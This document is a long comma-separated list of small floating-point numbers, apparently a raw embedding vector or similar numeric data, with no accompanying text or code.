0.018865404650568962, -0.04023032635450363, -0.01308527123183012, 0.008562334813177586, 0.020814433693885803, -0.006531476974487305, -0.04150984063744545, -0.015212835744023323, -0.018047111108899117, 0.0019973821472376585, 0.03055957518517971, -0.01509381178766489, 0.01562198344618082, -0.056120116263628006, 0.007003855891525745, -0.021751752123236656, 0.020501993596553802, -0.015049177221953869, -0.0052370838820934296, -0.0007025243248790503, -0.032077137380838394, 0.022852730005979538, 0.03210689499974251, -0.02971152402460575, -0.011113924905657768, 0.0546620637178421, -0.026155663654208183, 0.009291360154747963, 0.03177957609295845, -0.021439312025904655, 0.015011982060968876, 0.007773796562105417, 0.023656146600842476, -0.008897091262042522, 0.00506226671859622, 0.005036229733377695, 0.0049729980528354645, 0.029622256755828857, 0.04621131345629692, 0.00952197052538395, -0.021171506494283676, 0.023819804191589355, 0.01158258505165577, 0.00360235502012074, -0.011255267076194286, 0.007074526511132717, -0.021454190835356712, -0.008606969378888607, 0.015562471002340317, -0.012088439427316189, -0.0001300669537158683, -0.01092051062732935, 0.022882485762238503, 0.0011651396052911878, 0.006646782159805298, -0.006360379047691822, -0.003421958303079009, -0.009871605783700943, -0.008733432739973068, 0.019162965938448906, 0.015517836436629295, 0.014521005563437939, -0.0108684366568923, -0.003256439696997404, -0.0013566948473453522, -0.007736601401120424, 0.0016393783735111356, 0.026691274717450142, -0.0035614401567727327, -0.021692240610718727, 0.018999306485056877, -0.008904530666768551, 0.02225760743021965, 0.004162142518907785, -0.00231912056915462, -0.010087338276207447, -0.018225647509098053, -0.02410248853266239, 0.007327454164624214, 0.009581482969224453, 0.020174676552414894, 0.021171506494283676, 0.01913321018218994, 0.030708355829119682, -0.007744040340185165, -0.0005472343764267862, 0.021245896816253662, 0.03082738071680069, -0.0066095865331590176, -0.02585810236632824, 0.018954673781991005, 0.020546628162264824, 0.011880146339535713, -0.019162965938448906, -0.013360515236854553, -0.0067918431013822556, 0.009745142422616482, -0.008904530666768551, -0.022540289908647537, 0.001001480733975768, 0.027167372405529022, 0.007855625823140144, -0.020873945206403732, 0.0037474161945283413, -0.04109325632452965, 0.0035558610688894987, 0.0036655867006629705, -0.003699062392115593, -0.004630802199244499, -0.041956182569265366, -0.020368089899420738, -0.024444684386253357, 0.004017081577330828, -0.03496348485350609, 0.00046424256288446486, 0.009023555554449558, 0.00379948946647346, 0.07540210336446762, 0.025248100981116295, -0.00765477167442441, 0.012103317305445671, -0.013806858099997044, 0.0036042146384716034, 0.03442787751555443, -0.020382968708872795, 0.0033791838213801384, -0.0013036916498094797, 0.009879044257104397, -0.004883729387074709, -0.017526376992464066, -0.010317947715520859, 0.004649399779736996, -0.0065277572721242905, -0.004009642172604799, -0.010280752554535866, 0.017511500045657158, 0.0008178294519893825, -0.013248929753899574, 0.006762086879462004, 0.011872706934809685, -0.0011270145187154412, -0.0006746278959326446, 0.0036283915396779776, -0.013717588968575, -0.004508058074861765, -0.0038608615286648273, 0.013821735978126526, -0.0020754921715706587, -0.007863065227866173, 0.005958670750260353, -0.012319049797952175, -0.010950266383588314, -0.009425262920558453, -0.006003304850310087, -0.02745005674660206, -0.036719098687171936, -0.012549660168588161, -0.0031002198811620474, -0.0019676259253174067, -0.008941725827753544, -0.007587820291519165, 0.017630524933338165, 0.021067360416054726, -0.000653705617878586, -0.0029551584739238024, -0.009328555315732956, -0.009998069144785404, 0.0033717446494847536, -0.038474712520837784, -0.0015408111503347754, 0.02030857838690281, -0.012943929061293602, -0.028848595917224884, -0.010555997490882874, 0.008740871213376522, -0.018567843362689018, 0.008420992642641068, -0.0010665722656995058, -0.0077886744402348995, 0.011136242188513279, -0.03606446459889412, 0.0069369045086205006, 0.035023000091314316, -0.011299901641905308, 0.020174676552414894, 0.003766013775020838, 0.05234108492732048, 0.0028361338190734386, 0.01388124842196703, -0.02838737517595291, -0.008272211998701096, 0.020159797742962837, 0.029413962736725807, -0.007677088957279921, 0.0032899153884500265, 0.004147264640778303, -0.02295687608420849, -0.017585890367627144, 0.013858931139111519, 0.013665515929460526, 0.019371259957551956, 0.0002940745325759053, 0.01301087997853756, -0.002190797124058008, -0.01782393828034401, 0.02294199913740158, 0.0172883290797472, -0.02093345858156681, 0.018627354875206947, 0.030023964121937752, 0.012765391729772091, 0.021454190835356712, 0.03341616690158844, 0.03418982774019241, 0.01819589175283909, -0.00339034222997725, 0.028803961351513863, -0.021647606045007706, 0.00305930501781404, -0.0035316841676831245, 0.01867198944091797, -0.028432009741663933, 0.02062101848423481, -0.010905631817877293, 0.0031374150421470404, 0.011329657398164272, -0.005292876623570919, -0.006788123864680529, 0.004671717062592506, 0.016142716631293297, -0.006631903816014528, -0.017199059948325157, -0.0008066708687692881, -0.007249344140291214, 0.025203466415405273, -0.00795977283269167, -0.015294665470719337, 0.011389169842004776, -0.03035128116607666, 0.007900260388851166, -0.0031243967823684216, 0.006929465569555759, -0.006423610728234053, -0.0014747895766049623, 0.018002476543188095, 0.027137616649270058, 0.020368089899420738, 0.03811763972043991, -0.007546905893832445, -0.0009577763848938048, -0.015770765021443367, 0.0036042146384716034, 0.0007043840596452355, 0.010459289886057377, -0.005255681462585926, -0.015889788046479225, 0.01950516179203987, 0.009849288500845432, 0.03790934756398201, -0.0001606367586646229, 0.01639564335346222, -0.007691966835409403, 0.0005611825617961586, -0.01382917445152998, -0.004738668445497751, 0.027464933693408966, 0.021082239225506783, -0.0027468653861433268, -0.015428568236529827, 0.01691637560725212, 0.031392745673656464, 0.004392752889543772, -0.004381594248116016, -0.0006592848803848028, -0.0399625226855278, -0.004370435606688261, 0.006144646555185318, -0.0004370435781311244, 0.011909902095794678, 0.024147123098373413, 0.02105248160660267, 0.004742387682199478, 0.0341600701212883, 0.016365887597203255, 0.009477336890995502, -0.04008154571056366, 0.005947512108832598, -0.0036209526006132364, -0.0011391029693186283, 0.004697753582149744, 0.01703540049493313, 0.004664277657866478, 0.0029570183251053095, 0.017645401880145073, 0.013234051875770092, -0.005988426972180605, 0.025039806962013245, -0.016217106953263283, 0.014193687587976456, -0.028908107429742813, -0.0005504889413714409, 0.01892491616308689, -0.015108689665794373, 0.026735909283161163, -0.014476370997726917, -0.02575395628809929, 0.003991044592112303, 0.011783438734710217, 0.036570318043231964, -0.0028528717812150717, -0.016276618465781212, -0.024548830464482307, -0.016157593578100204, 0.0034628729335963726, 0.015190519392490387, 0.024772001430392265, 0.0012293013278394938, -0.013940759934484959, -0.013836613856256008, 0.014729298651218414, -0.006073975935578346, -0.02078467607498169, -0.04704448580741882, 0.012222342193126678, 0.006810440681874752, 0.017154425382614136, 0.01972833275794983, 0.009826971217989922, 0.006617025937885046, -0.012884416617453098, -0.030529819428920746, 0.03421958163380623, 0.008874773979187012, 0.003972447011619806, -0.030023964121937752, -0.00888221338391304, -0.034814704209566116, -0.026453224942088127, 0.016574179753661156, -0.0034145191311836243, 0.0005960530834272504, -0.013992833904922009, 0.008845018222928047, -0.00045936068636365235, -0.02279321849346161, 0.003472171723842621, 0.037195198237895966, 0.0005165483453311026, 0.003572598798200488, 0.0002645508502610028, -0.009745142422616482, -0.0004960909718647599, 0.017094913870096207, -0.007900260388851166, -0.008272211998701096, 0.0027766216080635786, 0.008807823061943054, 0.0029402803629636765, -0.016782473772764206, -0.028476644307374954, 0.007461356930434704, -0.005248242523521185, -0.0002761743380688131, -0.012177707627415657, 0.005925195291638374, -0.00859209056943655, 0.02051687054336071, -0.007565503474324942, 0.010927949100732803, -0.00043634616304188967, -0.01993662677705288, -0.0016979607753455639, -0.004463423974812031, -0.013174539431929588, 0.000651380920317024, 0.008346602320671082, 0.02082931064069271, 0.01649978943169117, 0.01956467516720295, 0.017466865479946136, 0.008495382964611053, -0.02024906687438488, 0.01941589266061783, -0.01166441384702921, 0.010578314773738384, -0.011218071915209293, 0.015324422158300877, -0.022778339684009552, -0.0003770663170143962, -0.008733432739973068, -0.03172006458044052, -0.0030444269068539143, 0.0009238357306458056, -0.016351008787751198, -0.01396307721734047, -0.009574044495821, 0.005757816601544619, 0.001710049225948751, 0.03285079821944237, -0.03082738071680069, -0.018374428153038025, 0.0012358104577288032, 0.006241354160010815, -0.008874773979187012, -0.006021902430802584, 0.017809061333537102, -0.010875876061618328, 0.017526376992464066, 0.027360787615180016, -0.02517371065914631, -0.004511777777224779, 0.01060063112527132, 0.024578586220741272, -0.007334893103688955, 0.02755420282483101, 0.028744449838995934, -0.023194925859570503, -0.007409283425658941, 0.04023032635450363, 0.01792808622121811, 0.02109711617231369, -0.024920782074332237, 0.017303206026554108, 0.020754920318722725, 0.012988563627004623, -0.005861963145434856, -0.0006481263553723693, 0.007431600708514452, 0.018002476543188095, 0.011232949793338776, 0.00178165000397712, -0.014736738055944443, -0.0012571976985782385, -0.013077831827104092, -0.012170269154012203, -0.0053375111892819405, -0.016142716631293297, 0.029116401448845863, 0.01908857561647892, -0.025724198669195175, 0.007758918218314648, 0.006323183886706829, 0.005173852201551199, -0.012624050490558147, -0.001453402335755527, -0.00856977328658104, -0.020531749352812767, 0.030321525409817696, 0.021558336913585663, 0.014439175836741924, 0.008034163154661655, -0.007952333427965641, -0.007238185498863459, -0.0016254301881417632, 0.025024930015206337, 0.014104419387876987, 0.008182943798601627, -0.03109518624842167, 0.005233364645391703, -0.0018495311960577965, -0.0010219380492344499, -0.005899158306419849, -0.02981567196547985, -0.008368919603526592, -0.017571011558175087, -0.008778066374361515, -0.021082239225506783, 0.0006383626023307443, 0.0004937662743031979, 0.0011632798705250025, 0.015562471002340317, -0.00718983169645071, 0.010927949100732803, 0.02056150510907173, 0.004816778004169464, 0.042372770607471466, 0.0012813745997846127, 0.02389419637620449, 0.0075692227110266685, -0.008956603705883026, -0.013152222149074078, -0.005880560725927353, -0.007372088264673948, 0.028193959966301918, 0.010749412700533867, -0.009670751169323921, 0.0003254579787608236, 0.009298799559473991, -0.023596633225679398, -0.020978091284632683, 0.015116129070520401, -0.005166413262486458, 0.0006606797105632722, -0.012966246344149113, -0.035558611154556274, -0.010689900256693363, -0.004329521209001541, 0.00007659885886823758, 0.00498415669426322, -0.005616474896669388, -0.025307612493634224, -0.012542220763862133, -0.026140784844756126, -0.012594293802976608, -0.027822008356451988, -0.00654263561591506, 0.0006374327349476516, 0.01129246223717928, 0.014230882748961449, -0.0055309259332716465, -0.006390135269612074, -0.0018671989673748612, 0.02126077562570572, 0.02172199636697769, -0.004794461186975241, -0.0024214074946939945, -0.011099047027528286, -0.006814160384237766, 0.0026743346825242043, 0.007989528588950634, 0.015019421465694904, 0.00005274163049762137, 0.008711115457117558, -0.02051687054336071, -0.014372224919497967, 0.03680836781859398, -0.01977296732366085, 0.003942691255360842, 0.007427881006151438, 0.0028026581276208162, -0.004552692174911499, -0.025679564103484154, -0.007003855891525745, -0.014193687587976456, 0.009960873983800411, 0.011456120759248734, -0.009194653481245041, 0.006278549320995808, 0.0018495311960577965, -0.007580381352454424, 0.0019694857764989138, 0.028937865048646927, -0.017332961782813072, 0.008473066613078117, -0.0017509639728814363, -0.021558336913585663, 0.017332961782813072, 0.006784404162317514, -0.004072874318808317, -0.0012060543522238731, -0.01675271801650524, 0.01586003229022026, -0.021960044279694557, 0.0032452810555696487, -0.013040636666119099, -0.004147264640778303, 0.0033736045006662607, 0.007416722364723682, 0.009373189881443977, -0.014416858553886414, -0.0033884826116263866, 0.002741286065429449, -0.009209531359374523, -0.0042328136041760445, 0.012341367080807686, -0.009998069144785404, 0.0030444269068539143, 0.024563709273934364, 0.007383246906101704, 0.005028790794312954, 0.014617713168263435, -0.00790769886225462, -0.013397710397839546, 0.01776442676782608, -0.02844688855111599, -0.005661108996719122, -0.0024307062849402428, 0.02093345858156681, -0.017942963168025017, -0.005344950128346682, -0.012832343578338623, 0.023180047050118446, 0.010846120305359364, -0.002326559741050005, 0.0171841811388731, 0.026096152141690254, -0.005661108996719122, 0.014245760627090931, 0.005847085267305374, -0.004727509804069996, -0.014461493119597435, -0.004820497706532478, 0.013360515236854553, -0.010846120305359364, 0.0072307465597987175, 0.00047261148574762046, -0.013509295880794525, 0.002030857838690281, 0.014104419387876987, -0.01065270509570837, -0.009760020300745964, 0.012408317998051643, 0.021082239225506783, 0.0245339535176754, 0.013903564773499966, -0.009194653481245041, 0.008941725827753544, -0.0018048969795927405, 0.0014422438107430935, -0.020963214337825775, 0.0027357067447155714, 0.015681495890021324, 0.002415828173980117, -0.0017965281149372458, 0.015279787592589855, -0.013449783436954021, -0.008019284345209599, 0.010012947022914886, 0.002771042287349701, 0.0146474689245224, -0.024831514805555344, 0.01369527168571949, 0.01020636223256588, 0.0174966212362051, 0.00872599333524704, 0.010489045642316341, -0.011136242188513279, -0.00983441062271595, -0.0027245483361184597, -0.015473202802240849, 0.0019155527697876096, -0.016306374222040176, -0.00313369557261467, 0.0028286948800086975, -0.010489045642316341, -0.005768975242972374, -0.029428841546177864, -0.004887449089437723, -0.01760076731443405, -0.019222479313611984, -0.003637690329924226, -0.002499517286196351, -0.011069291271269321, 0.000779704365413636, 0.031005917116999626, -0.020487114787101746, -0.010236118920147419, -0.019534917548298836, 0.0021350043825805187, -0.011218071915209293, 0.0006867163465358317, -0.01306295394897461, 0.005021351855248213, 0.0069740996696054935, 0.0086441645398736, 0.017065156251192093, 0.005549523513764143, 0.00605537835508585, -0.02925030328333378, 0.0026259811129420996, 0.003792050527408719, -0.012430635280907154, -0.00418817950412631, 0.009797215461730957, -0.011634658090770245, -0.006033061072230339, 0.006568672135472298, -0.013635760173201561, -0.010079898871481419, -0.013211734592914581, 0.0038608615286648273, -0.0005072494968771935, -0.0065649524331092834, 0.015413690358400345, 0.012847221456468105, -0.007532027550041676, 0.007093124557286501, -0.015830276533961296, 0.020382968708872795, 0.02326931618154049, -0.013665515929460526, 0.005185010842978954, 0.007498552091419697, 0.008822700940072536, 0.028432009741663933, 0.018419062718749046, -0.01345722284168005, 0.014826006256043911, 0.010883315466344357, 0.023983463644981384, 0.01586003229022026, 0.02326931618154049, -0.0007062438526190817, -0.00502507109194994, -0.01454332284629345, 0.02780712954699993, -0.007033612113445997, -0.0009452229714952409, 0.012066122144460678, -0.022867608815431595, -0.015607105568051338, -0.014052346348762512, 0.0057875728234648705, 0.007249344140291214, 0.005051108077168465, -0.0024046695325523615, -0.013977956026792526, 0.014922713860869408, -0.009068189188838005, -0.0071600754745304585, 0.020918579772114754, -0.020219309255480766, -0.013992833904922009, 0.006509159691631794, -0.0010312368394806981, -0.005065985955297947, 0.01314478274434805, 0.012341367080807686, -0.011649535968899727, 0.007111722137778997, 0.0034386960323899984, 0.0002358408091822639, -0.011515633203089237, 0.013650638051331043, 0.012185147032141685, 0.007625015452504158, -0.004913485608994961, 0.00967819057404995, -0.01049648504704237, 0.012601733207702637, -0.0108684366568923, 0.02109711617231369, 0.00339034222997725, 0.008785505779087543, -0.02078467607498169, 0.0008475855574943125, -0.031482014805078506, 0.013048076070845127, -0.004995315335690975, -0.005397023167461157, -0.006736050359904766, -0.004403911530971527, 0.010622948408126831, -0.011173437349498272, -0.025768833234906197, -0.019891992211341858, -0.012832343578338623, 0.006431049667298794, -0.003557720687240362, 0.003745556576177478, 0.012386000715196133, -0.0017267870716750622, 0.01617247238755226, -0.01414161454886198, -0.0050920224748551846, -0.0005397953209467232, -0.002953298855572939, -0.0052370838820934296, -0.0004514567262958735, -0.008391236886382103, 0.014342468231916428, 0.008034163154661655, -0.024295903742313385, -0.009670751169323921, 0.008316846564412117, -0.029785914346575737, 0.0060516586527228355, 0.0014692103723064065, 0.006393854506313801, -0.02527785673737526, 0.00626739114522934, 0.02697395719587803, -0.003806928638368845, -0.012170269154012203, -0.008502822369337082, -0.03258299455046654, -0.006602147594094276, 0.0074130031280219555, 0.010704778134822845, -0.012333927676081657, 0.003187628462910652, 0.01703540049493313, 0.016529547050595284, -0.010503924451768398, 0.00956660509109497, -0.007390685845166445, -0.009425262920558453, -0.0023600354325026274, -0.019817601889371872, -0.003868300700560212, -0.002614822471514344, -0.01639564335346222, -0.016797350719571114, 0.02146906778216362, 0.010555997490882874, -0.028253473341464996, -0.010131971910595894, -0.008733432739973068, 0.0023209804203361273, -0.008346602320671082, 0.007781235501170158, -0.01776442676782608, -0.02389419637620449, 0.01809174381196499, -0.023343706503510475, -0.008584652096033096, 0.005251962225884199, 0.007331173401325941, 0.0051924497820436954, -0.010712217539548874, 0.0009419684065505862, -0.010489045642316341, -0.02332882769405842, 0.005170132499188185, 0.000755062501411885, 0.007736601401120424, 0.00956660509109497, -0.004482021555304527, -0.016589058563113213, -0.00795977283269167, 0.012207464314997196, 0.009752580896019936, -0.00856977328658104, 0.015294665470719337, 0.00699269725009799, 0.0024716209154576063, -0.011411487124860287, -0.027003714814782143, 0.0006434769602492452, 0.0019081137143075466, -0.003708361182361841, 0.015354177914559841, 0.0021945165935903788, -0.0016430978430435061, 0.011649535968899727, -0.005263120401650667, 0.022138582542538643, 0.008026723749935627, 0.0029402803629636765, 0.006397574208676815, 0.014208565466105938, 0.007691966835409403, 0.023031266406178474, 0.0015110549284145236, -0.023938829079270363, -0.00592147558927536, 0.006397574208676815, 0.02416200004518032, 0.0019081137143075466, 0.007186112459748983, 0.004474582150578499, -0.000027518635761225596, -0.00861440785229206, 0.0034703121054917574, -0.005039949435740709, 0.0036060744896531105, 0.00044029817217960954, 0.00477214390411973, -0.012043804861605167, -0.00496927835047245, -0.015547593124210835, -0.005757816601544619, 0.005188730079680681, -0.013568808324635029, 0.017645401880145073, -0.00037102209171280265, 0.0058582439087331295, 0.0036600076127797365, 0.019862236455082893, 0.006624464876949787, 0.0014003992546349764, -0.0007118231151252985, -0.012095878832042217, -0.00861440785229206, -0.0003917119465768337, 0.008227577432990074, -0.013234051875770092, -0.00006387112807715312, -0.0013604144332930446, -0.008502822369337082, 0.005132937338203192, 0.033654216676950455, -0.028699815273284912, 0.006553793791681528, -0.029800793156027794, -0.029532987624406815, -0.021111994981765747, -0.018642233684659004, -0.01629149727523327, 0.020606139674782753, -0.013129904866218567, -0.0021852178033441305, -0.011932219378650188, 0.016038568690419197, 0.008792945183813572, 0.016306374222040176, 0.0003019785217475146, 0.0014106278540566564, -0.013486978597939014, -0.017853695899248123, 0.024295903742313385, 0.012705880217254162, -0.011656975373625755, -0.0016393783735111356, 0.004106349777430296, -0.013048076070845127, -0.01861247792840004, -0.015502958558499813, -0.011768560856580734, -0.004370435606688261, -0.0030035122763365507, 0.013353075832128525, 0.018359549343585968, 0.008078796789050102, 0.014193687587976456, 0.024355415254831314, -0.009350872598588467, 0.0004998104996047914, -0.016470033675432205, 0.02056150510907173, 0.018433939665555954, 0.011195754632353783, 0.0057503776624798775, -0.008339163847267628, 0.013940759934484959, 0.01401515118777752, -0.002447444014251232, -0.009715385735034943, 0.0062339152209460735, -0.01882077008485794, -0.012386000715196133, -0.0024716209154576063, 0.0047535463236272335, -0.003219244536012411, -0.014766493812203407, 0.02341809682548046, 0.016797350719571114, 0.010280752554535866, -0.0012674264144152403, 0.0245339535176754, -0.010622948408126831, -0.01221490278840065, -0.008078796789050102, 0.018433939665555954, -0.0035800377372652292, 0.004418789409101009, -0.00015133796841837466, 0.0001390170509694144, 0.018865404650568962, -0.0027877800166606903, -0.017377596348524094, -0.015339300036430359, -0.014111857861280441, 0.0011037675430998206, -0.00022933165018912405, 0.00885989610105753, 0.010875876061618328, -0.0032638786360621452, -0.0031857688445597887, -0.02268907055258751, -0.0011762981303036213, -0.0025348528288304806, -0.012981124222278595, 0.013204295188188553, -0.014208565466105938, 0.0053747063502669334, -0.0028063778299838305, -0.004727509804069996, 0.02072516456246376, -0.012475269846618176, -0.00790769886225462, 0.018791014328598976, 0.0038645812310278416, 0.010570875369012356, -0.022302240133285522, -0.020338334143161774, -0.008049041032791138, -0.005281717982143164, -0.011240389198064804, 0.028461765497922897, -0.0066356235183775425, -0.018731502816081047, -0.008495382964611053, -0.012051244266331196, 0.003219244536012411, -0.02078467607498169, -0.009730263613164425, -0.000014979785191826522, -0.015577348880469799, 0.03722495585680008, -0.0041249473579227924, -0.01548808068037033, 0.024608343839645386, 0.008153187111020088, 0.005739219021052122, -0.01876125857234001, -0.00006945041241124272, 0.024310782551765442, -0.00644964724779129, -0.009358312003314495, -0.003381043439731002, -0.009760020300745964, -0.023983463644981384, 0.01782393828034401, -0.022510534152388573, 0.021082239225506783, -0.0010433252900838852, 0.0017398054478690028, -0.003306653117761016, 0.015354177914559841, 0.0009447580669075251, 0.003103939350694418, 0.023566877469420433, -0.009216969832777977, 0.0017286468064412475, 0.013248929753899574, 0.03151177242398262, 0.0016077624168246984, -0.003994764294475317, 0.021647606045007706, 0.013762223534286022, 0.024295903742313385, -0.0019378698198124766, 0.007141477894037962, 0.005069705657660961, -0.025709321722388268, 0.013107587583363056, 0.0006007024785503745, 0.0004895817837677896, 0.021766630932688713, -0.03124396689236164, 0.03633226826786995, 0.0289824977517128, -0.010987461544573307, -0.0012525483034551144, -0.013665515929460526, 0.010422094725072384, 0.04272984340786934, -0.007591539993882179, 0.0385044701397419, 0.020531749352812767, -0.0017053998308256269, -0.008815262466669083, 0.005616474896669388, -0.0011632798705250025, -0.015681495890021324, 0.0007894680602476001, -0.004932083189487457, 0.004630802199244499, -0.005292876623570919, 0.018686868250370026, -0.025411760434508324, 0.014580518007278442, 0.008004406467080116, -0.009425262920558453, -0.0486513189971447, -0.0011567706242203712, -0.009179774671792984, -0.03543958440423012, 0.004601045977324247, -0.008473066613078117, 0.010236118920147419, -0.002356315730139613, 0.012839782051742077, 0.01946052722632885, -0.00422909390181303, -0.0028882070910185575, -0.02136492170393467, -0.008235016837716103, 0.00046098799793981016, -0.016202228143811226, 0.010637826286256313, 0.0026482981629669666, -0.010667582973837852, 0.001487807952798903, 0.02786664292216301, 0.0075580645352602005, -0.010317947715520859, -0.043235696852207184, 0.015101250261068344, 0.02130541019141674, -0.0066728186793625355, -0.008532578125596046, -0.018017353489995003, 0.01359112560749054, 0.011463560163974762, -0.0012934630503877997, 0.026244932785630226, 0.008874773979187012, 0.0005467694136314094, -0.014721859246492386, 0.0007532027666456997, 0.009425262920558453, -0.017749547958374023, -0.012378562241792679, 0.002069912850856781, 0.016990765929222107, 0.0007564573315903544, 0.002218693494796753, -0.03680836781859398, -0.004095191136002541, -0.01303319726139307, -0.00028826278867200017, 0.0007234466029331088, -0.00832428503781557, -0.0001991105527849868, -0.020978091284632683, 0.01602369174361229, -0.03350543603301048, 0.014424297958612442, -0.004660558421164751, 0.018047111108899117, -0.000828987977001816, 0.00008903600974008441, 0.01388124842196703, -0.0031076588202267885, -0.016886619850993156, 0.002906804671511054, -0.023983463644981384, 0.017407352104783058, -0.010139411315321922, 0.003609793959185481, -0.0005044598947279155, -0.003574458649381995, 0.023150291293859482, 0.0034145191311836243, 0.012490147724747658, 0.015339300036430359, 0.020115163177251816, -0.018597599118947983, 0.0014496828662231565, 0.001971345627680421, -0.005292876623570919, -0.010719656012952328, 0.007055928930640221, -0.0349932424724102, -0.011835511773824692, -0.01776442676782608, 0.0012990422546863556, 0.020963214337825775, 0.006907148286700249, -0.0196688212454319, 0.004359277430921793, -0.010169167071580887, 0.002592505421489477, -0.00605537835508585, -0.001963906455785036, -0.011597462929785252, -0.005947512108832598, 0.006352940108627081, 0.007059648633003235, 0.016693204641342163, 0.028045179322361946, -0.0014636310515925288, 0.011500755324959755, 0.0005077144596725702, -0.004742387682199478, 0.0037195198237895966, 0.005545804277062416, -0.01623198390007019, 0.0029161034617573023, 0.01644027791917324, -0.005880560725927353, -0.0007113581523299217, -0.006590988952666521, 0.012698440812528133, 0.010258435271680355, -0.011381730437278748, 0.017154425382614136, -0.011560267768800259, -0.03442787751555443, -0.007357210386544466, -0.00007886544335633516, 0.016782473772764206, -0.0016096222680062056, -0.01591954566538334, 0.0071600754745304585, -0.024667855352163315, 0.004708912223577499, 0.000008550537131668534, 0.0002819861110765487, 0.003128116251900792, 0.012943929061293602, -0.023983463644981384, -0.005501169711351395, -0.030708355829119682, -0.0010916790924966335, -0.013524173758924007, 0.0023823524825274944, 0.004240252543240786, 0.004065435379743576, 0.010898193344473839, -0.020382968708872795, 0.017437109723687172, -0.0028435729909688234, -0.0005909387255087495, 0.0067806844599545, -0.004556411877274513, 0.0046084849163889885, 0.00944014173001051, 0.014662346802651882, 0.008093675598502159, -0.0031987871043384075, -0.017571011558175087, -0.003148573450744152, 0.003654428292065859, 0.015547593124210835, -0.009916240349411964, 0.0031727503519505262, -0.02030857838690281, -0.006248793564736843, 0.009551727212965488, 0.006966660730540752, -0.013271247036755085, 0.0086441645398736, -0.005028790794312954, 0.007033612113445997, -0.008532578125596046, 0.014394542202353477, 0.00859209056943655, 0.023552000522613525, -0.026319323107600212, -0.009298799559473991, -0.005404462106525898, -0.00506226671859622, 0.002371193841099739, -0.005731780081987381, -0.010794046334922314, -0.01289929449558258, -0.0030239697080105543, 0.0024307062849402428, -0.0011428224388509989, 0.011991731822490692, -0.010027825832366943, -0.010236118920147419, -0.03103567287325859, -0.01612783782184124, 0.0026166823226958513, 0.0018467416521161795, 0.010325387120246887, -0.009343434125185013, 0.008934286423027515, -0.005992146674543619, 0.0017481743125244975, -0.015993935987353325, 0.007089404854923487, -0.030009085312485695, -0.017734671011567116, -0.023938829079270363, 0.0043146428652107716, -0.007900260388851166, -0.0037567149847745895, 0.001320429495535791, -0.009216969832777977, -0.010927949100732803, -0.0024827795568853617, -0.021126871928572655, -0.017362719401717186, 0.007974650710821152, -0.015235153026878834, -0.020978091284632683, 0.004775863606482744, -0.007249344140291214, 0.0020810712594538927, -0.022480778396129608, 0.00872599333524704, 0.02780712954699993, 0.012147951871156693, 0.002361895050853491, 0.010660143569111824, -0.008792945183813572, 0.02532249130308628, -0.007647332735359669, 0.011128803715109825, -0.004043118096888065, 0.02521834522485733, -0.00436299666762352, -0.0031095186714082956, -0.016112960875034332, -0.014260639436542988, -0.0008796664187684655, -0.012631488963961601, -0.016782473772764206, 0.0016840125899761915, -0.00231912056915462, -0.010191484354436398, -0.00001407169929734664, -0.015398812480270863, -0.01571125164628029, 0.00245302333496511, -0.005162693560123444, 0.002423267113044858, -0.005504889413714409, -0.01414161454886198, -0.0028528717812150717, -0.011359413154423237, -0.00151012500282377, 0.01314478274434805, 0.007234466262161732, -0.006843916606158018, 0.013360515236854553, 0.027212006971240044, -0.023775171488523483, -0.0021945165935903788, -0.002936560893431306, -0.023447852581739426, -0.004292326048016548, -0.012467830441892147, 0.019549796357750893, 0.006215317640453577, 0.012735635973513126, 0.014349907636642456, -0.021766630932688713, -0.004043118096888065, -0.007744040340185165, 0.018493453040719032, 0.013278685510158539, -0.0020234188996255398, -0.016946133226156235, -0.0003903171163983643, -0.014573078602552414, -0.009774898178875446, 0.028789084404706955, -0.013159661553800106, -0.009298799559473991, -0.008502822369337082, -0.016306374222040176, 0.005352389067411423, 0.009499653242528439, -0.0008089955663308501, 0.02304614521563053, -0.00009862539445748553, -0.013658076524734497, 0.00008252684347098693, 0.010950266383588314, 0.005579279735684395, 0.0038868982810527086, -0.01919272169470787, 0.0032992141786962748, -0.0028882070910185575, -0.017585890367627144, -0.006207878701388836, -0.008815262466669083, -0.037314221262931824, -0.032077137380838394, -0.008919408544898033, 0.0029644572641700506, -0.001320429495535791, 0.004764704965054989, 0.018106622621417046, -0.010191484354436398, 0.017303206026554108, -0.022718826308846474, 0.0010795906418934464, 0.0084879444912076, 0.03252348303794861, 0.010198923759162426, 0.01076429057866335, 0.01281746570020914, 0.00253113335929811, 0.009953435510396957, 0.018731502816081047, 0.0122669767588377, 0.004206777084618807, 0.008763188496232033, 0.01876125857234001, 0.0036228122189641, 0.00927648227661848, 0.01240087952464819, -0.008480505086481571, -0.007152636535465717, -0.0002898900711443275, 0.009655873291194439, 0.02030857838690281, 0.006211597938090563, -0.006825319025665522, 0.014930152334272861, 0.005917755886912346, -0.014788811095058918, -0.009469897486269474, -0.03003884293138981, 0.020472237840294838, -0.0053375111892819405, -0.004485740792006254, -0.022480778396129608, 0.019847357645630836, -0.006356659345328808, -0.005114339757710695, 0.013643198646605015, 0.006241354160010815, -0.013293564319610596, 0.02981567196547985, -0.004671717062592506, 0.0005509539041668177, 0.008130870759487152, -0.010860998183488846, 0.012921611778438091, 0.010012947022914886, 0.016737839207053185, 0.00806391891092062, 0.018419062718749046, 0.028461765497922897, -0.016574179753661156, 0.0015919544966891408, 0.004831656347960234, 0.001626359997317195, 0.014468932524323463, 0.0099385567009449, 0.02495053969323635, 0.00930623896420002, -0.0076324548572301865, 0.006509159691631794, 0.020159797742962837, -0.028625424951314926, -0.0063826958648860455, -0.004191898740828037, -0.019891992211341858, -0.010481607168912888, -0.015116129070520401, 0.00502507109194994, -0.00002958180630230345, -0.005441657733172178, -0.008205261081457138, 0.015339300036430359, -0.010689900256693363, -0.023834683001041412, -0.0000981023331405595, 0.00007392545376205817, 0.013382832519710064, 0.000555138336494565, 0.0014710701070725918, -0.0031522931531071663, -0.014751615934073925, -0.016618814319372177, -0.005006473511457443, 0.02977103739976883, -0.004548972938209772, 0.01834467239677906, 0.003256439696997404, -0.011188315227627754, -0.018433939665555954, 0.002350736642256379, 0.018389306962490082, 0.005475133191794157, -0.002640858991071582, -0.006799282040446997, 0.007368369027972221, 0.011366852559149265, 0.0036451295018196106, -0.0056759873405098915, 0.015741007402539253, -0.004005922935903072, -0.004511777777224779, 0.007167514879256487, -0.0075580645352602005, -0.004902326967567205, 0.023879317566752434, 0.014848323538899422, -0.02198980189859867, -0.009581482969224453, 0.00032755022402852774, -0.026557371020317078, -0.005426779389381409, 0.020710285753011703, 0.022927120327949524, 0.006170683540403843, 0.015458324924111366, 0.009469897486269474, -0.03591568395495415, 0.001993662677705288, -0.005910316947847605, 0.009581482969224453, 